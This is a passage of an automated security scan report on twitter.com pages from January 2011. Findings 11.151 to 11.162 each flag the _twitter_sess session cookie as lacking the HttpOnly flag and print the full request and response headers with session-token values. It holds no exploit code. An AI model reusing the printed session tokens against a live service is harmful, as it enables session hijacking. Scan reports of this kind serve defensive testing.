<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.151. http://twitter.com/oschina

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /oschina

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oschina HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:47 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224927-42931-41515
ETag: "4ec91c8ea22a5f99253e904c27c6fcbf"
Last-Modified: Fri, 28 Jan 2011 14:28:47 GMT
X-Runtime: 0.00766
Content-Type: text/html; charset=utf-8
Content-Length: 42639
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.152. http://twitter.com/oschina/status/28102821484171264

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /oschina/status/28102821484171264

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oschina/status/28102821484171264 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:51 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224931-1588-6053
ETag: "74e24e45fa1e508376ab48a014b754fb"
Last-Modified: Fri, 28 Jan 2011 14:28:51 GMT
X-Runtime: 0.05739
Content-Type: text/html; charset=utf-8
Content-Length: 13642
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vb3NjaGluYS9z%250AdGF0dXMvMjgxMDI4MjE0ODQxNzEyNjQ6DGNzcmZfaWQiJTEwZDU0OTEzNjYw%250AOWY1ZTk1YmNlOWQ5ZWI3Njc5ZjczOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--68179dfd893f83c3d5cc5cabbcfb96d9a300ec19; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.153. http://twitter.com/oschina/status/30099933486915584

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /oschina/status/30099933486915584

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oschina/status/30099933486915584 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224930-28853-36094
ETag: "f8b960d6a56094881d4f6783365ecf28"
Last-Modified: Fri, 28 Jan 2011 14:28:50 GMT
X-Runtime: 0.06167
Content-Type: text/html; charset=utf-8
Content-Length: 13721
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vb3NjaGluYS9z%250AdGF0dXMvMzAwOTk5MzM0ODY5MTU1ODQ6DGNzcmZfaWQiJWZkOWU3MGFjNzg5%250ANmVhNjZmOTMxN2NlNjZmMGExNWNkOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--6d3f8e3e6d67d971b281da438de9b57a6477922e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.154. http://twitter.com/privacy

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /privacy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225080-72692-36002
ETag: "728deff396f751fb7d15a00d76938c97"
Last-Modified: Fri, 28 Jan 2011 14:31:20 GMT
X-Runtime: 0.03526
Content-Type: text/html; charset=utf-8
Content-Length: 18932
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlNGY1MzgyYzMzYTg4Mzg2YTMzY2RlZDc2NjAwMDli%250AMzM6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--0d04f4b19d1ef9fb4248b979f81a1df77a504fb3; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.155. http://twitter.com/profile/not_logged_in/malsup

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /profile/not_logged_in/malsup

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /profile/not_logged_in/malsup HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 404 Not Found
Date: Fri, 28 Jan 2011 14:31:21 GMT
Server: hi
Status: 404 Not Found
X-Transaction: 1296225081-23068-11363
Last-Modified: Fri, 28 Jan 2011 14:31:21 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9230
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...

11.156. http://twitter.com/rachbarnhart

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /rachbarnhart

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rachbarnhart HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:34 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225034-44205-8520
ETag: "2d3e9ea7bdf09844d1aed67d3b8c66fc"
Last-Modified: Fri, 28 Jan 2011 14:30:34 GMT
X-Runtime: 0.01426
Content-Type: text/html; charset=utf-8
Content-Length: 52627
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.157. http://twitter.com/rem

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /rem

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rem HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225036-70162-12873
ETag: "f1048f44c2dbfae0ca279695ab2f56e2"
Last-Modified: Fri, 28 Jan 2011 14:30:36 GMT
X-Runtime: 0.00958
Content-Type: text/html; charset=utf-8
Content-Length: 54681
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.158. http://twitter.com/rickrussie

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /rickrussie

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rickrussie HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:14 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225014-95753-62367
ETag: "8ac086fffec8d5f0dbc55eb3e67e6a96"
Last-Modified: Fri, 28 Jan 2011 14:30:14 GMT
X-Runtime: 0.00915
Content-Type: text/html; charset=utf-8
Content-Length: 51643
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.159. http://twitter.com/rickrussie/status/28548182396903424

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /rickrussie/status/28548182396903424

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rickrussie/status/28548182396903424 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225014-32961-2577
ETag: "d46b26b9fe929840b674f147c0c89142"
Last-Modified: Fri, 28 Jan 2011 14:30:14 GMT
X-Runtime: 0.33011
Content-Type: text/html; charset=utf-8
Content-Length: 13807
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjtodHRwOi8vdHdpdHRlci5jb20vcmlja3J1c3Np%250AZS9zdGF0dXMvMjg1NDgxODIzOTY5MDM0MjQ6DGNzcmZfaWQiJTExNDc5ZjQ5%250AMmU2NjM5OTY2ODQ3NTY5ZjUxYWFlNjlmOg9jcmVhdGVkX2F0bCsIM07wzC0B%250AOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNo%250ASUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1%250Ac2VkewA%253D--3d3bd2cab72fb51e93b5fed240300828d4f6844c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.160. http://twitter.com/roctimo

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /roctimo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /roctimo HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:29:11 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224951-66281-31354
ETag: "9b0bbae04a168790126e11b0e79fd723"
Last-Modified: Fri, 28 Jan 2011 14:29:11 GMT
X-Runtime: 0.01993
Content-Type: text/html; charset=utf-8
Content-Length: 39421
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.161. http://twitter.com/roctimo/status/29669358812790784

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /roctimo/status/29669358812790784

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /roctimo/status/29669358812790784 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:29:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224952-82366-17089
ETag: "352d65a2c5752e7711f2873e5d5683dc"
Last-Modified: Fri, 28 Jan 2011 14:29:12 GMT
X-Runtime: 0.06219
Content-Type: text/html; charset=utf-8
Content-Length: 13608
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vcm9jdGltby9z%250AdGF0dXMvMjk2NjkzNTg4MTI3OTA3ODQ6DGNzcmZfaWQiJWRhM2Y2NDUyMWY4%250AOWYxMzc2YjkzMTBhNGFhODkyOTBlOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--160e3ed7351db2a00b10df68a0ea6d7aa90fed75; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.162. http://twitter.com/rwaldron

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /rwaldron

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: _twitter_sess (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rwaldron HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
